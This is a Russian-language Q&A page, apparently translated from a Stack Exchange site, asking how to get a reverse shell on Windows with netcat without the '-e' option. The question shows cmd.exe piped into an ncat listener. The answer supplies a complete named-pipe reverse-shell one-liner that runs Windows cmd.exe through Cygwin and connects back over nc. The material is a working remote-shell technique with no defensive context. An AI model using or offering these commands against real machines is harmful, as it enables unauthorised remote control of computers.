Обратная оболочка с использованием netcat на windows (без опции -e)

Question

Есть ли способ получить обратную оболочку в Windows, используя netcat без опции -e, так как она вызывает UAC?

Я сделал это с Linux на Linux, используя именованный канал. Я хотел добиться чего-то похожего в Windows.

Запуск c:\windows\system32\cmd.exe | ncat -l -p 666 в Windows выдает подсказку в Linux при подключении:

# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user> dir

^C

Похоже, я рядом, может, чего-то простого не хватает? Если бы в Windows были только именованные каналы ...

Answer 1

Я не уверен, что вы можете сделать это с чистым win32 netcat, но вы можете сделать это в Cygwin. Прослушайте 1234 как nc -l 1234 затем подключитесь к нему в отдельном окне с помощью этой команды:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f

Обратите внимание, что клавиши «вверх» и «вниз» не работают для циклического перемещения по истории команд с использованием этого метода.